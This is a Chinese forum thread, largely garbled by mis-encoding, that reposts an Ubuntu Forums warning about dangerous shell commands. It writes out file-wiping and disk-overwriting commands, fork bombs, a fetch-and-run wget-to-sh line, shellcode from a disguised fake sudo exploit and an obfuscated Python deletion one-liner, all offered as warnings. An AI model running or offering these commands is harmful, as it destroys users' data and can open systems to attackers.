²é¿´: 701  |  »Ø¸´: 1
µ±Ç°Ö÷ÌâÒѾ­´æµµ¡£

dnp

ÈÙÓþ°æÖ÷ (ÖªÃû×÷¼Ò)

Сľ³æÀË×Ó

ÓÅÐã°æÖ÷

[½»Á÷] [תÌù]Çë²»ÒªÖ´ÐÐÈçÏÂÀàËÆÃüÁî--UbuntuΣÏÕÃüÁî

×î½üubuntu¹Ù·½ÂÛ̳·¢³öÁ˹ٷ½Í¨¸æ, ÁгöÏÂÁÐΣÏÕÃüÁî, ¸æ½ëÓû§²»ÒªÖ´ÐÐ, ²¢¶ÔËæÒâÕÅÌùÏÂÁÐÃüÁîµÄÕʺŴ¦ÒÔÖ±½Ó·âºÅµÄ´¦·£.


ÔÙ´ÎÉùÃ÷, Çë²»ÒªÖ´ÐÐÏÂÁлòÀàËÆÏÂÁеÄÃüÁî, ÕâЩÃüÁ»á¶ÔÄãµÄ¼ÆËã»úÔì³ÉÑÏÖØÓ°Ïì.

Çë²»ÒªÒÔʲô¸øÆÕͨÓû§½ÌѵÀ´Ìá¸ßËûÃǵݲȫÒâʶµÈµÈÍдÊÀ´Îª×Ô¼º²»»³ºÃÒâµÄÐÐΪ×÷Ϊ½è¿Ú!

http://ubuntuforums.org/announcement.php?a=54

Delete all files, delete current directory, and delete visible files in current directory. It's quite obvious why these commands can be dangerous to execute.
ÏÂÁÐÃüÁî»áɾ³ýËùÓÐÎļþ, ɾ³ýµ±Ç°Ä¿Â¼, ɾ³ýµ±Ç°Ä¿Â¼ÏÂÃæµÄÎļþ.

´úÂë:

rm -rf /
rm -rf .
rm -rf *


Reformat: Data on device mentioned after the mkfs command will be destroyed and replaced with a blank filesystem.
ÏÂÁÐÃüÁî»á´Ý»ÙÕû¸öÎļþϵͳ, ÖØ½¨·ÖÇø.

´úÂë:

mkfs
mkfs.ext3
mkfs.anything


Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data:
ÏÂÁÐÃüÁî»áÇå¿ÕÕû¸öÓ²ÅÌ.

´úÂë:
any_command > /dev/sda
dd if=something of=/dev/sda


Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.
In Bourne-ish shells, like Bash: (This thing looks really intriguing and curiousity provokes)
ÏÂÁÐÃüÁî»áÆô¶¯´óÁ¿½ø³Ì, µ¼ÖÂϵͳÎÞ·¨ÏìÓ¦, Ö»ÄÜÓ²ÖØÆô»úÆ÷, ¿ÉÄܻᵼÖÂÊý¾ÝËðº¦.

´úÂë:
){:|:&};:


In Perl


´úÂë:
fork while fork


Tarbomb: Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make the habit of decompressing tars inside a cleanly made directory

Decompression bomb: Someone asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of GB's, filling your hard drive. You should not touch data from an untrusted source

Shellscript: Someone gives you the link to a shellscript to execute. This can contain any command he chooses -- benign or malevolent. Do not execute code from people you don't trust
²»ÒªÖ´ÐÐÄã²»ÐÅÈεÄÈËÌṩµÄshell½Å±¾, ÀïÃæ¿ÉÄܺ¬ÓÐΣÏÕµÄÃüÁîºÍ½Å±¾, ²»ÒªËæÒâ½âѹ±ðÈËÌṩµÄѹËõ°ü, Ò²Ðí¿´ÆðÀ´ºÜС, ½á¹û½âѹ³öÀ´»áÈûÂúÕû¸öÓ²ÅÌ.

´úÂë:

wget http://some_place/some_file
sh ./some_file




´úÂë:
wget http://some_place/some_file -O- | sh


Compiling code: Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile OR execute the compiled code unless the source is of some well-known application, obtained from a reputable site (i.e. SourceForge, the author's homepage, an Ubuntu address).

A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. In it was this payload:

²»Òª±àÒëÔËÐбðÈËÌṩµÄ²»Ã÷´úÂë

´úÂë:
char esp[] __attribute__ ((section(".text")) /* e.s.p
release */
                = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
                  "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
                  "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
                  "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
                  "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
                  "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
                  "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
                  "cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";


To the new or even lightly experienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root. If you could see this command in the hex string, then you don't need to be reading this announcement. Otherwise, remember that these things can come in very novel forms -- watch out.


Again, recall these are not at all comprehensive and you should not use this as a checklist to determine if a command is dangerous or not!

For example, 30 seconds in Python yields something like this:


´úÂë:
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'


Where "sn!.sg!+" is simply rm -rf * shifted a character up. Of course this is a silly example -- I wouldn't expect anyone to be foolish enough to paste this monstrous thing into their terminal without suspecting something might be wrong.
»Ø¸´´ËÂ¥
What would Jesus do?
ÒÑÔÄ   »Ø¸´´ËÂ¥   ¹Ø×¢TA ¸øTA·¢ÏûÏ¢ ËÍTAºì»¨ TAµÄ»ØÌû

dnp

ÈÙÓþ°æÖ÷ (ÖªÃû×÷¼Ò)

Сľ³æÀË×Ó

ÓÅÐã°æÖ÷

¶ÔÓÚÉÏÃæµÄÁ½¸ö±íÇ飬´úÂëÊÇÕâÑùµÄ£º
ÎÒÔÚÖмä¼ÓÁËÒ»¸ö''_''£¬¿Õ¸ñµÄ¾ÍÒÔ¿Õ¸ñ´úÌæ£¬ÒÔ·ÀÖ¹ÔÙÉú³É±íÇ飺
µÄ´úÂ룺:_(
µÄ´úÂ룺(
What would Jesus do?
2Â¥2007-12-12 21:52:48
ÒÑÔÄ   »Ø¸´´ËÂ¥   ¹Ø×¢TA ¸øTA·¢ÏûÏ¢ ËÍTAºì»¨ TAµÄ»ØÌû
Ïà¹Ø°æ¿éÌø×ª ÎÒÒª¶©ÔÄÂ¥Ö÷ dnp µÄÖ÷Ìâ¸üÐÂ
×î¾ßÈËÆøÈÈÌûÍÆ¼ö [²é¿´È«²¿] ×÷Õß »Ø/¿´ ×îºó·¢±í
[¿¼ÑÐ] 265Çóµ÷¼Á +9 ÁºÁºÐ£Ð£ 2026-03-19 9/450 2026-03-20 12:33 by lature00
[¿¼ÑÐ] 317Çóµ÷¼Á +4 Éê×ÓÉêÉê 2026-03-19 8/400 2026-03-20 11:20 by Éê×ÓÉêÉê
[¿¼ÑÐ] Ò»Ö¾Ô¸¼ªÁÖ´óѧ²ÄÁÏѧ˶321Çóµ÷¼Á +11 Ymlll 2026-03-18 14/700 2026-03-20 10:46 by EBSD
[¿¼ÑÐ] 085410È˹¤ÖÇÄÜר˶317Çóµ÷¼Á£¨0854¶¼¿ÉÒÔ£© +4 xbxudjdn 2026-03-18 4/200 2026-03-20 09:07 by ²»168
[¿¼²©] É격26Äê +3 °Ë6°Ë68 2026-03-19 3/150 2026-03-19 19:43 by nxgogo
[¿¼ÑÐ] 0703»¯Ñ§µ÷¼Á £¬Áù¼¶Òѹý£¬ÓпÆÑо­Àú +12 êØÎõÙâ 2026-03-15 12/600 2026-03-19 19:42 by maocaozhuxi
[¿¼ÑÐ] 286Çóµ÷¼Á +6 lemonzzn 2026-03-16 10/500 2026-03-19 14:31 by lemonzzn
[¿¼ÑÐ] Çóµ÷¼Á +3 Mqqqqqq 2026-03-19 3/150 2026-03-19 14:11 by peike
[¿¼ÑÐ] 311Çóµ÷¼Á +6 26ÑÐ0 2026-03-15 6/300 2026-03-18 14:43 by haxia
[¿¼ÑÐ] 311Çóµ÷¼Á +11 ¶¬Ê®Èý 2026-03-15 12/600 2026-03-18 14:36 by ÐÇ¿ÕÐÇÔÂ
[¿¼ÑÐ] ¿¼ÑÐÇóµ÷¼Á +3 éÙËÌ. 2026-03-17 4/200 2026-03-17 21:43 by ÓÐÖ»ÀêÅ«
[˶²©¼ÒÔ°] ºþ±±¹¤Òµ´óѧ ÉúÃü¿ÆÑ§Ó뽡¿µÑ§Ôº-¿ÎÌâ×éÕÐÊÕ2026¼¶Ê³Æ·/ÉúÎï·½Ïò˶ʿ +3 1ϲ´º8 2026-03-17 5/250 2026-03-17 17:18 by ber´¨cool×Ó
[¿¼ÑÐ] 308Çóµ÷¼Á +4 ÊÇLupa°¡ 2026-03-16 4/200 2026-03-17 17:12 by ruiyingmiao
[¿¼ÑÐ] 332Çóµ÷¼Á +6 Zz°æ 2026-03-13 6/300 2026-03-17 17:03 by ruiyingmiao
[»ù½ðÉêÇë] ½ñÄêµÄ¹ú»ù½ðÊÇ´ò·ÖÖÆÂ𣿠50+3 zhanghaozhu 2026-03-14 3/150 2026-03-16 17:07 by ±±¾©À³ÒðÈóÉ«
[¿¼ÑÐ] 304Çóµ÷¼Á +5 ËØÄê¼ÀÓï 2026-03-15 5/250 2026-03-16 17:00 by ÎҵĴ¬Îҵĺ£
[¿¼ÑÐ] 318Çóµ÷¼Á +3 Yanyali 2026-03-15 3/150 2026-03-16 16:41 by houyaoxu
[¿¼ÑÐ] 070300»¯Ñ§Ñ§Ë¶Çóµ÷¼Á +6 Ì«Ïë½ø²½ÁË0608 2026-03-16 6/300 2026-03-16 16:13 by kykm678
[¿¼ÑÐ] 0703 ÎïÀí»¯Ñ§µ÷¼Á +3 ÎÒ¿ÉÒÔÉϰ¶µÄ¶Ô 2026-03-13 5/250 2026-03-16 10:50 by ÎÒ¿ÉÒÔÉϰ¶µÄ¶ÔÂ
[¿¼ÑÐ] ±¾¿ÆÄϾ©´óѧһ־Ը´¨´óҩѧ327 +3 ÂóÌï¸ûÕß 2026-03-14 3/150 2026-03-14 20:04 by ÍâÐÇÎÄÃ÷
ÐÅÏ¢Ìáʾ
ÇëÌî´¦ÀíÒâ¼û